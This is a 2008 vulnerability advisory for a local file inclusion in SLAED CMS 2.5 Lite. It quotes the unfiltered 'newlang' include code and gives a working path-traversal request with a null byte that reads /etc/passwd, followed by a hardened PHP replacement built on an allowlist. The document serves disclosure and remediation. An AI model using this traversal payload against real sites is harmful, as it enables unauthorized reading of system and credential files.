
slaed-lfi.txt

Posted Jan 24, 2008
Authored by The_HuliGun

SLAED CMS version 2.5 Lite suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | af400b87370b956274750ff712748b1b64e9a1745e6ac4676cce456d143ac66a

# SLAED CMS 2.5 Lite Local file inclusion

# Script url http://www.slaed.net/uploads/files/public/SLAED_CMS_2.5_Lite.zip

# Let's look at the code in function/sources.php (starting at line 780):

// Format language
function get_lang($module="") {
    global $multilingual, $currentlang, $language, $user_cookie_t;
    if (isset($_REQUEST['newlang']) && $multilingual == "1") {
        if (file_exists("language/lang-".$_REQUEST['newlang'].".php")) {
            setcookie("lang", $_REQUEST['newlang'], time() + intval($user_cookie_t));
            require_once("language/lang-".$_REQUEST['newlang'].".php");
...

# And in index.php (lines 9-10):

require_once("function/function.php");
get_lang();

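# As you can see, the newlang variable is not filtered before it is concatenated into the path passed to require_once(). The trailing %00 null byte cuts off the appended ".php" suffix, and magic_quotes_gpc would escape that byte, so if magic_quotes_gpc is turned off, the following request exploits it: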

http://[targethost]/[path]/index.php?newlang=../../../../../../../../../../etc/passwd%00
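
# The fix is to stop building the include path from raw request input. A hardened variant of get_lang() follows as an added example; it is not SLAED's own patch, and resolve_lang_file(), get_lang_hardened() and the language/lang-<name>.php layout beside this file are assumptions:

```php
<?php
// Added example, not SLAED code. Assumption: language files are stored as
// <this dir>/language/lang-<name>.php.

// Map a requested language name to a file on disk, or return null.
function resolve_lang_file(string $requested, string $langDir): ?string
{
    // 1. Strict syntax: no dots, slashes or NUL bytes can pass this pattern,
    //    so "../" traversal and %00 truncation are rejected up front.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }

    // 2. Allowlist: only names of language files that actually exist.
    $allowed = [];
    foreach (glob($langDir . '/lang-*.php') ?: [] as $path) {
        // "lang-english.php" -> "english"
        $allowed[substr(basename($path, '.php'), 5)] = $path;
    }
    if (!isset($allowed[$requested])) {
        return null;
    }

    // 3. Defence in depth: the resolved path must stay inside $langDir
    //    (catches symlinks pointing elsewhere).
    $base = realpath($langDir);
    $real = realpath($allowed[$requested]);
    if ($base === false || $real === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Same flow as the original get_lang(), but the include path comes from the
// allowlist lookup instead of from $_REQUEST.
function get_lang_hardened(string $module = ""): void
{
    global $multilingual, $user_cookie_t;
    $new = $_REQUEST['newlang'] ?? null;
    if (is_string($new) && $multilingual == "1") {
        $file = resolve_lang_file($new, __DIR__ . '/language');
        if ($file !== null) {
            setcookie("lang", $new, time() + intval($user_cookie_t));
            require_once $file;
        }
    }
}
```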

# Bug discovered by The_HuliGun

# Greetz to: NaTka and all people who understand...

# See u soon!
